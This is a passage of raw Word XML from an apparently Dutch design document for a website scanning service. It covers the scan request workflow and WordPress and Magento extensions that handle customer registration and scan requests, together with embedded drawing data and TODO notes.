      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> De klant verzendt het aanvraagformulier door op de knop verzenden te drukken.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124FCED0" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Er wordt een API Call gedaan naar de server met het verzoek een scan uit te voeren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABDBDE2" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De applicatie voert de scan uit via een terminal commando op de server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A430A" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De data wordt opgeslagen in een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MySQl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5AE2D2" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De applicatie genereert een rapport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BC8CCC" w14:textId="77777777" w:rsidR="003918A9" w:rsidRDefault="003918A9" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De applicatie verstuurd het rapport via de email naar de klant toe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE59F1D" w14:textId="276EC78B" w:rsidR="0028014E" w:rsidRDefault="0028014E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55434D39" w14:textId="3B619E28" w:rsidR="006E3A79" w:rsidRDefault="006E3A79" w:rsidP="006E3A79">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc491022080"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2 CMS extensies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="2AFD281E" w14:textId="34FF17D5" w:rsidR="005D301A" w:rsidRPr="005D301A" w:rsidRDefault="005D301A" w:rsidP="005D301A">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251856896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39420AA4" wp14:editId="2D67A3BF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-201295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>184150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6515735" cy="1297940"/>
                <wp:effectExtent l="0" t="0" r="37465" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="487" name="Text Box 32"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6515735" cy="129794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40616AC" w14:textId="3623280B" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005D301A">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                                <w:b/>
                                <w:noProof/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175F0B60" wp14:editId="344422FD">
                                  <wp:extent cx="266700" cy="266700"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="517"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CMS</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6A27582B" w14:textId="0607F51D" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005D301A">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                              </w:rPr>
                              <w:t>Content Management Systeem</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7C019014" w14:textId="1DE47673" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005D301A">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                              </w:rPr>
                              <w:t>Een CMS is het systeem achter een website dat het beheren hiervan eenvoudiger maakt. Zo kan iemand met relatief weinig technische kennis een website bouwen en beheren.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="00879F92" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00A93B54" w:rsidRDefault="00CE4BB5" w:rsidP="005D301A">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bol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20AA4" id="Text Box 32" o:spid="_x0000_s1062" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-15.85pt;margin-top:14.5pt;width:513.05pt;height:102.2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mAHKQCAADZBQAADgAAAGRycy9lMm9Eb2MueG1srFTfT9swEH6ftP/B8vtIU1pKK1LUgZgmMUAr&#10;E8+uY7fRbJ9nu026v35nJykdQ5qY9pLYd9/9+nx3F5eNVmQnnK/AFDQ/GVAiDIeyMuuCfnu8+XBO&#10;iQ/MlEyBEQXdC08v5+/fXdR2JoawAVUKR9CJ8bPaFnQTgp1lmecboZk/ASsMKiU4zQJe3TorHavR&#10;u1bZcDA4y2pwpXXAhfcovW6VdJ78Syl4uJfSi0BUQTG3kL4ufVfxm80v2GztmN1UvEuD/UMWmlUG&#10;gx5cXbPAyNZVf7jSFXfgQYYTDjoDKSsuUg1YTT54Uc1yw6xItSA53h5o8v/PLb/bPThSlQUdnU8o&#10;MUzjIz2KJpCP0JDTYSSotn6GuKVFZGhQjg/dyz0KY92NdDr+sSKCeqR6f6A3euMoPBvn48npmBKO&#10;unw4nUxH6QGyZ3PrfPgkQJN4KKjD90u0st2tD5gKQntIjOZBVeVNpVS6xJ4RV8qRHcPXXq3zZKq2&#10;+guUrWw6Hgz6kKnFIjx5/c2TMn9zHprEAKZzZIi31lKkxusyjuy1LKVT2CsRvSvzVUgkPpH1SvqM&#10;c2FCHyWhI0pisW8x7PDRtM3qLcYHixQZTDgY68qAS/QeaGwZLr/3KcsWj+we1R2PoVk1qeOG076L&#10;VlDusbkctPPpLb+psAFumQ8PzOFAYj/hkgn3+JEK6oJCd6JkA+7na/KIxzlBLSU1DnhB/Y8tc4IS&#10;9dngBE3zEbYfCekyGk+GeHHHmtWxxmz1FWBX5bjOLE/HiA+qP0oH+gl30SJGRRUzHGMXNPTHq9Cu&#10;HdxlXCwWCYQ7wLJwa5aWR9eR5tjej80Tc7abgYDjcwf9KmCzF6PQYqOlgcU2gKzSnESiW1a7B8D9&#10;kRq923VxQR3fE+p5I89/AQAA//8DAFBLAwQUAAYACAAAACEAaYHIOd8AAAAKAQAADwAAAGRycy9k&#10;b3ducmV2LnhtbEyPwU7DMAyG70i8Q2QkLmhLt1aMlqYTTOLIgYHQjllj2orGKUnadW+PObGj7U+/&#10;v7/czrYXE/rQOVKwWiYgkGpnOmoUfLy/LB5AhKjJ6N4RKjhjgG11fVXqwrgTveG0j43gEAqFVtDG&#10;OBRShrpFq8PSDUh8+3Le6sijb6Tx+sThtpfrJLmXVnfEH1o94K7F+ns/WgXm089ns6vtYap/hvH5&#10;bnr1iVTq9mZ+egQRcY7/MPzpszpU7HR0I5kgegWLdLVhVME6504M5HmWgTjyIk0zkFUpLytUvwAA&#10;AP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRl&#10;bnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwB&#10;AABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAmGYAcpAIAANkFAAAOAAAAAAAAAAAAAAAAACwC&#10;AABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBpgcg53wAAAAoBAAAPAAAAAAAAAAAAAAAA&#10;APwEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAACAYAAAAA&#10;" fillcolor="#f2f2f2 [3052]" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="540616AC" w14:textId="3623280B" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005D301A">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                          <w:b/>
                          <w:noProof/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175F0B60" wp14:editId="344422FD">
                            <wp:extent cx="266700" cy="266700"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="517"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CMS</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6A27582B" w14:textId="0607F51D" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005D301A">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                        </w:rPr>
                        <w:t>Content Management Systeem</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7C019014" w14:textId="1DE47673" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="005D301A">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                        </w:rPr>
                        <w:t>Een CMS is het systeem achter een website dat het beheren hiervan eenvoudiger maakt. Zo kan iemand met relatief weinig technische kennis een website bouwen en beheren.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="00879F92" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00A93B54" w:rsidRDefault="00CE4BB5" w:rsidP="005D301A">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC17C6B" w14:textId="1FB0EEA9" w:rsidR="00715F38" w:rsidRDefault="00AA65F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252005376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61C0954C" wp14:editId="08DF49B6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-136525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1293495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4445000" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="245" name="Text Box 245"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="44450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5331352" w14:textId="0C53D117" w:rsidR="00CE4BB5" w:rsidRPr="00AA65F4" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Business </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Doel</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">Een Client applicatie voor de klant wat dient als </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Endpoint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C0954C" id="Text Box 245" o:spid="_x0000_s1063" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-10.75pt;margin-top:101.85pt;width:350pt;height:27pt;z-index:25200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JahIYCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFTdb9MwEH9H4n+w/M7SdhmwaulUOg0hTdtE&#10;h/bsOnZrYfuM7TYpfz1nJ2mrsZchXpLz3e++P66uW6PJTvigwFZ0fDaiRFgOtbLriv54uv3wmZIQ&#10;ma2ZBisquheBXs/ev7tq3FRMYAO6Fp6gERumjavoJkY3LYrAN8KwcAZOWBRK8IZFfPp1UXvWoHWj&#10;i8lo9LFowNfOAxchIPemE9JZti+l4PFByiAi0RXF2GL++vxdpW8xu2LTtWduo3gfBvuHKAxTFp0e&#10;TN2wyMjWq79MGcU9BJDxjIMpQErFRc4BsxmPXmSz3DAnci5YnOAOZQr/zyy/3z16ouqKTsoLSiwz&#10;2KQn0UbyBVqSeFihxoUpApcOobFFAXZ64AdkpsRb6U36Y0oE5Vjr/aG+yRxHZlmWF6MRijjKzsvJ&#10;JdJovjhqOx/iVwGGJKKiHvuXy8p2dyF20AGSnFm4VVrnHmqbGAG0qhMvP9IQiYX2ZMew/bHNQaO3&#10;ExS+Ok2Rh6X3khLuEstU3GuRDGr7XUgsVs7vFQ+Mc2Hj4CWjE0piPG9R7PFJtYvqLcoHjewZbDwo&#10;G2XB52rm7ToWpv45hCw7PLbkJO9ExnbV5ik5zx1LrBXUe5wHD91OBcdvFTbtjoX4yDwuEfYZD0N8&#10;wI/U0FQUeoqSDfjfr/ETHmcbpZQ0uJQVDb+2zAtK9DeLU385Lsu0xflRXnya4MOfSlanErs1C8DG&#10;j/EEOZ7JhI96IKUH84z3Y568oohZjr5xUgZyEbtTgfeHi/k8g3BvHYt3dul4Mp3KnEbyqX1m3vVz&#10;G3Hi72FYXzZ9Mb4dNmlamG8jSJVn+1jVvgG483k7+vuUjsrpO6OOV3T2BwAA//8DAFBLAwQUAAYA&#10;CAAAACEAuuerh+IAAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwWrCQBCG74W+wzKF3nRjionE&#10;bKRVhCL2oBbxuGanSWh2NmRXjW/f6ak9zj8f/3yTLwbbiiv2vnGkYDKOQCCVzjRUKfg8rEczED5o&#10;Mrp1hAru6GFRPD7kOjPuRju87kMluIR8phXUIXSZlL6s0Wo/dh0S775cb3Xgsa+k6fWNy20r4yhK&#10;pNUN8YVad7issfzeX6yC98N9s0uXH4ndvK1O26P0x/Vqq9Tz0/A6BxFwCH8w/OqzOhTsdHYXMl60&#10;CkbxZMqogjh6SUEwkaQzTs6cTNMUZJHL/z8UPwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsA&#10;AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA&#10;IQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA&#10;IQAwIlqEhgIAAI0FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQC656uH4gAAAAsBAAAPAAAAAAAAAAAAAAAAAN4EAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAA7QUAAAAA&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="25331352" w14:textId="0C53D117" w:rsidR="00CE4BB5" w:rsidRPr="00AA65F4" w:rsidRDefault="00CE4BB5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Business </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Doel</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">Een Client applicatie voor de klant wat dient als </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Endpoint</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A549A41" w14:textId="77777777" w:rsidR="00175FA1" w:rsidRDefault="00175FA1"/>
    <w:p w14:paraId="40D79889" w14:textId="3EB4216F" w:rsidR="00A36047" w:rsidRDefault="006A763D">
      <w:r>
        <w:t xml:space="preserve">Het systeem maakt gebruik van twee soorten content </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F3D54">
        <w:t>CMS’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B345E4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B345E4">
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B345E4">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B345E4">
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B345E4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00635E4D">
        <w:t xml:space="preserve">Er wordt voor beide een extensie ontwikkeld dat de registratie en aanvraag voor een scan </w:t>
      </w:r>
      <w:r w:rsidR="00937985">
        <w:t>verzendt</w:t>
      </w:r>
      <w:r w:rsidR="001452CB">
        <w:t xml:space="preserve"> naar het systeem via de API. Iedere soort </w:t>
      </w:r>
      <w:r w:rsidR="000D27D0">
        <w:t>CMS-extensies</w:t>
      </w:r>
      <w:r w:rsidR="001452CB">
        <w:t xml:space="preserve"> zal uit twee formulieren bestaan die als “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001452CB">
        <w:t>endpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001452CB">
        <w:t xml:space="preserve">” zullen dienen voor het systeem.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1441829C" w14:textId="6CDBF284" w:rsidR="00052921" w:rsidRDefault="007A1E40">
      <w:r>
        <w:t>Registratie</w:t>
      </w:r>
      <w:r w:rsidR="005F4C37">
        <w:t xml:space="preserve"> proces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E7C997" w14:textId="05DA6E95" w:rsidR="005F4C37" w:rsidRDefault="007262C3">
      <w:r>
        <w:t>De</w:t>
      </w:r>
      <w:r w:rsidR="009151EA">
        <w:t xml:space="preserve"> registratie van een klant behoort tot de voorwaarden v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">oor het aanvragen van een scan. </w:t>
      </w:r>
      <w:r w:rsidR="00A36047">
        <w:t>De klant moet door een registratie proces heen gaan om geauthentiseerd en geautoriseerd</w:t>
      </w:r>
      <w:r w:rsidR="00A0397C">
        <w:t xml:space="preserve"> te worden</w:t>
      </w:r>
      <w:r w:rsidR="00A36047">
        <w:t xml:space="preserve"> voor het maken van een scan. Bij het registreren worden de klantengegevens ingevuld en wordt het f</w:t>
      </w:r>
      <w:r w:rsidR="009E59A8">
        <w:t xml:space="preserve">ormulier naar het systeem en worden de gegevens opgeslagen in de database. Om het proces compleet te maken zal S5 de registratie bekijken, contact opnemen met de klant om er zeker van te zijn dat zij zich hebben geregistreerd. Zo ja, dan activeren zij de extensie vanuit de database </w:t>
      </w:r>
      <w:r w:rsidR="005F4C37">
        <w:t>en de klant gebruik maken van het volgende proces, de aanvraag van een scan.</w:t>
      </w:r>
      <w:r w:rsidR="007C0A92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C0341" w14:textId="242EEC71" w:rsidR="007C0A92" w:rsidRDefault="000F4958">
      <w:r>
        <w:t xml:space="preserve">//TODO </w:t>
      </w:r>
      <w:r w:rsidR="007C0A92">
        <w:t>Email proces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F4A6EF" w14:textId="27B5B353" w:rsidR="00003CCA" w:rsidRDefault="00003CCA"/>
    <w:p w14:paraId="4A699E01" w14:textId="5467597D" w:rsidR="00C307FE" w:rsidRDefault="00003CCA">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251859968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DC520F8" wp14:editId="64512C21">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>322580</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2121535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4369435" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="54" name="Text Box 54"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4369435" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5181D6C3" w14:textId="7ABF78DC" w:rsidR="00CE4BB5" w:rsidRPr="00F04F14" w:rsidRDefault="00CE4BB5" w:rsidP="002C41CF">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.6 TODO update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C520F8" id="Text Box 54" o:spid="_x0000_s1064" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:25.4pt;margin-top:167.05pt;width:344.05pt;height:21.2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9ngjkCAAB4BAAADgAAAGRycy9lMm9Eb2MueG1srFRNb9swDL0P2H8QdF+c77VBnCJLkWFA0RZI&#10;hp4VWY4FSKImKbGzXz9KttOu22nYRaFI6tF8j8zyrtGKnIXzEkxOR4MhJcJwKKQ55vT7fvvphhIf&#10;mCmYAiNyehGe3q0+fljWdiHGUIEqhCMIYvyitjmtQrCLLPO8Epr5AVhhMFiC0yzg1R2zwrEa0bXK&#10;xsPhPKvBFdYBF96j974N0lXCL0vBw1NZehGIyil+W0inS+chntlqyRZHx2wlefcZ7B++QjNpsOgV&#10;6p4FRk5O/gGlJXfgoQwDDjqDspRcpB6wm9HwXTe7ilmRekFyvL3S5P8fLH88Pzsii5zOppQYplGj&#10;vWgC+QINQRfyU1u/wLSdxcTQoB917v0enbHtpnQ6/mJDBOPI9OXKbkTj6JxO5rfTyYwSjrHx/Pbm&#10;8yzCZK+vrfPhqwBNopFTh+olUtn5wYc2tU+JxTwoWWylUvESAxvlyJmh0nUlg+jAf8tSJuYaiK9a&#10;wNYj0qh0VWLDbWPRCs2hSQRNrl0foLggGQ7acfKWbyWWf2A+PDOH84P9406EJzxKBXVOobMoqcD9&#10;/Js/5qOsGKWkxnnMqf9xYk5Qor4ZFDwOb2+43jj0hjnpDWDjI9w2y5OJD1xQvVk60C+4KutYBUPM&#10;cKyV09Cbm9BuBa4aF+t1SsIRtSw8mJ3lEbqned+8MGc7kQLK+wj9pLLFO63a3KSWXZ8CEp+EjMS2&#10;LOIAxAuOdxqFbhXj/ry9p6zXP4zVLwAAAP//AwBQSwMEFAAGAAgAAAAhAEXA8/XiAAAACgEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SFwQdUpC2oY4VVXBAS4VoZfe3HgbB+J1ZDtt&#10;+HvMCY47O5p5U64n07MzOt9ZEjCfJcCQGqs6agXsP17ul8B8kKRkbwkFfKOHdXV9VcpC2Qu947kO&#10;LYsh5AspQIcwFJz7RqORfmYHpPg7WWdkiKdruXLyEsNNzx+SJOdGdhQbtBxwq7H5qkcjYJcddvpu&#10;PD2/bbLUve7Hbf7Z1kLc3kybJ2ABp/Bnhl/8iA5VZDrakZRnvYDHJJIHAWmazYFFwyJdroAdo7LI&#10;c+BVyf9PqH4AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;A